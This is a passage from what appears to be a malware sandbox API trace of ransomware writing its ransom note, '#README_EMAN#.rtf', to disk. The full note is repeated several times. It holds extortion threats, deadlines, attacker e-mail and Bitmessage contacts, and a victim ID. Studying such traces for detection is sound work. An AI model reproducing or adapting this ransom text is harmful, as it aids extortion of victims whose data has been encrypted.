w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24886f8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x1drUß÷\x92\x8f\x94®Â¥:­¥\x92\x16Ë\x97mî¾Á\x163\r", lpUsedDefaultChar=0x0) returned 8717 [0267.748] WriteFile (in: hFile=0x2c8, lpBuffer=0x24886f8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24886f8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0267.749] CloseHandle (hObject=0x2c8) returned 1 [0267.749] GetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\#readme_eman#.rtf")) returned 0xffffffff [0267.749] GetLastError () returned 0x2 [0267.749] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0268.702] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0268.702] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n 